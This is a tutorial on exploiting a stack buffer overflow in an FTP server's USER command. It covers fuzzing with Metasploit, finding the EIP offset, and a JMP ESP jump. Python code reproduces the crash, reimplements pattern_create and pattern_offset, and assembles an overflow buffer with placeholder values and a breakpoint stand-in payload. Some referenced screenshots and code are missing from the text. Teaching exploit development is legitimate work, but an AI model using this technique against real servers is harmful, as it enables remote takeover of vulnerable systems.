This article is in the spirit of the "buffer overflows for dummies" series. In this class of vulnerability, the approach is to send an oversized buffer to the program through one of its inputs (the network, the program's own controls, a file, and so on) and overwrite important parts of the program's memory. By overwriting those memory regions we can redirect the program's execution flow and run injected code.
The first thing we need to do is identify which part of the program's input can be used to overwrite memory. The process that handles this task is known as "fuzzing". The Metasploit Framework ships with a number of fuzzers for various protocols that perform this task for us.
In the following example we use Metasploit to fuzz an FTP server:
After the fuzzer has run for a few minutes the program crashes, see below:
In the Metasploit window we can see the length of the buffer that caused the crash:
Analysing all of the output, we can conclude that the FTP server crashes when the argument of the USER command is a buffer larger than 250 bytes.
We can reproduce the crash with Python:
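The crash reproducer below is an added example, not the script from the original article. It sends a USER command with an oversized argument, which is the condition the fuzzer output pointed at. The target address, port and buffer length are assumptions for a lab setup; the only requirement from the text is that the buffer be longer than 250 bytes.

```python
import socket

# Assumed lab values: adjust to the host running the vulnerable FTP server.
TARGET_HOST = "192.168.1.10"   # assumption, not an address from the article
TARGET_PORT = 21
CRASH_LENGTH = 300             # anything over the ~250-byte threshold the fuzzer found


def build_crash_buffer(length: int = CRASH_LENGTH) -> bytes:
    """A buffer of 'A' (0x41) bytes: 0x41414141 is easy to recognise in the debugger's registers."""
    return b"A" * length


def build_user_command(payload: bytes) -> bytes:
    """Wrap the payload in an FTP USER command; FTP commands are terminated by CRLF."""
    return b"USER " + payload + b"\r\n"


def send_crash(host: str = TARGET_HOST, port: int = TARGET_PORT,
               length: int = CRASH_LENGTH) -> bytes:
    """Connect, read the banner, send the oversized USER command and return the banner.

    Once the server crashes it will usually not answer, so nothing is read after sending.
    """
    with socket.create_connection((host, port), timeout=5) as s:
        banner = s.recv(1024)
        s.sendall(build_user_command(build_crash_buffer(length)))
    return banner


if __name__ == "__main__":
    print(send_crash())
```

Keep the buffer made of a single recognisable byte at this stage: when the process dies under the debugger, registers full of 0x41 tell you immediately which ones were taken from your input.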
Now we run the attack again, but this time we first attach a debugger to the FTP server process. The debugger used here is OllyDbg.
During the attack we can see very clearly that the ESP, EDI and EIP registers have been overwritten.
A little research shows why this matters: EIP controls the program's execution flow, because it holds the address of the next instruction to be executed. If we can overwrite EIP, we can redirect execution wherever we want.
Next we need to know how many bytes of the buffer it takes to reach EIP. We can use Metasploit's pattern_create to generate a non-repeating pattern, send that as the buffer, and from the value that lands in EIP work out the position of those 4 bytes.
We add this pattern to our exploit code and run it again:
Now we can see the pattern in the program's memory.
Now we use pattern_offset to find the exact position of those 4 bytes: we simply pass the 4-byte value that landed in EIP to the script as its argument.
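To make the pattern_create / pattern_offset step concrete, here is a small pure-Python reimplementation of both tools, added as an example (it is not the Metasploit code, but it uses the same character sets and ordering, so the offsets it reports match). The point it shows is the one detail that trips people up: the value the debugger displays in EIP is a little-endian dword, so it has to be byte-reversed before searching for it in the pattern.

```python
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length: int) -> bytes:
    """Generate the cyclic pattern Aa0Aa1Aa2...Aa9Ab0Ab1...Zz9, truncated to `length` bytes.

    Every 4-byte window in it is unique, so the dword that lands in EIP pins down one offset.
    """
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length: int = MAX_LEN):
    """Return the offset of `value` inside a pattern of `length` bytes, or None if it is not there.

    `value` may be an int (the EIP value as shown by OllyDbg, e.g. 0x41326141), a str
    or bytes (the 4 characters as they sit in memory).
    """
    if isinstance(value, int):
        # x86 is little-endian: EIP=0x41326141 means the bytes 41 61 32 41 ("Aa2A") were on the stack
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    # Constructed example: send a 300-byte pattern, then imagine the debugger shows EIP = 0x41326141
    print(pattern_create(300))
    print(pattern_offset(0x41326141, 300))   # offset of "Aa2A" in the pattern
```

pattern_offset returns the number of filler bytes that come before the 4 bytes that overwrite EIP. Sending a pattern at least as long as the crash buffer from the fuzzing step matters: if the pattern is shorter than the distance to the saved return address, EIP will not be overwritten at all and the lookup will fail.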
The bytes that follow the 4-byte EIP overwrite end up at the address held in ESP, so we can write a piece of exploit code like the following:
If we load it in OllyDbg again, we can see that it works well.
This is what ESP points to once EIP has been overwritten:
So what do we need to put into EIP? We place our malicious code right after the 4 bytes that overwrite EIP, and then all EIP has to do is land on a simple JMP ESP.
Remember, EIP contains the address of the next instruction to execute, so in this case what we need is the address of a JMP ESP instruction somewhere in the process. We can search for one in OllyDbg (in the E tab, the executable modules view). Pick an address in a module that is not rebased and whose bytes contain none of the characters the FTP server will mangle (such as 0x00, 0x0a and 0x0d).
A simple search command returns an address to us.
Now we copy this address:
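Putting the pieces together, the block below is an added example of how the final buffer is laid out: filler up to the EIP offset, the JMP ESP address in little-endian byte order, a short NOP sled, then the payload. The offset, the JMP ESP address and the payload are all placeholders (assumptions): the real offset comes from pattern_offset and the real address from the OllyDbg search above. The payload is four INT3 breakpoints, which is the usual way to confirm in the debugger that execution really reached the bytes at ESP before swapping in real shellcode. The buffer is sent as the argument of the USER command, exactly as in the crash reproducer.

```python
import struct

# Placeholders, not values from the article: replace with your own findings.
EIP_OFFSET = 250             # assumed: the number reported by pattern_offset
JMP_ESP_ADDR = 0x7C9D30D7    # assumed: an address whose bytes are FF E4 (JMP ESP), as found in OllyDbg
BAD_CHARS = b"\x00\x0a\x0d"  # NUL terminates C strings; CR/LF end an FTP command line
SHELLCODE = b"\xcc" * 4      # INT3 x4: a stand-in payload that stops the debugger when reached


def build_exploit(offset: int = EIP_OFFSET, jmp_esp: int = JMP_ESP_ADDR,
                  shellcode: bytes = SHELLCODE, nops: int = 16) -> bytes:
    """Assemble the overflow buffer.

    After the vulnerable function returns, the CPU pops our 4 bytes into EIP and ESP is left
    pointing at the dword right after them, so JMP ESP lands on the NOP sled and slides into the payload.
    """
    eip = struct.pack("<I", jmp_esp)          # little-endian, the order the CPU reads it off the stack
    return b"A" * offset + eip + b"\x90" * nops + shellcode


def has_bad_chars(buf: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return the list of forbidden byte values present in `buf` (empty list means it is clean)."""
    return [b for b in bad if b in buf]


def layout(buf: bytes, offset: int = EIP_OFFSET) -> dict:
    """Describe where each part of the buffer sits, handy for checking against the debugger view."""
    return {
        "filler": (0, offset),
        "eip": (offset, offset + 4),
        "at_esp": (offset + 4, len(buf)),
    }


if __name__ == "__main__":
    buf = build_exploit()
    assert not has_bad_chars(buf), "address or payload contains a bad character"
    print(layout(buf))
```

The bad-character check is the step most often skipped: if the chosen JMP ESP address or the payload contains a byte the server's command parser truncates on, the buffer the program sees is not the one you sent, and EIP will point somewhere other than your JMP ESP.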